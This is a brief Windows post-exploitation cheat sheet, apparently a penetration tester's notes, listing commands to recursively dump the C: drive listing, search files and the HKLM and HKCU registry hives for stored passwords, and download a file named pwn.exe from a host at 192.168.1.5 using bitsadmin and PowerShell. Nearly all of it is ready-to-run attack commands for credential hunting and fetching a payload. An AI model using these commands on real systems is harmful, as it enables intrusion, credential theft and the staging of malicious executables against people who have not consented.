Dump directory Listing
dir /b /a /s c:\ > dirlist
Filter for “passw” (case-insensitive)
findstr /i passw
Download file with bitsadmin
bitsadmin /transfer job1 /download http://192.168.1.5/pwn.exe %cd%\pwn.exe
Download file with PowerShell
powershell -c '(New-Object System.Net.WebClient).DownloadFile("http://192.168.1.5/pwn.exe", "%cd%\pwn.exe")'
Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s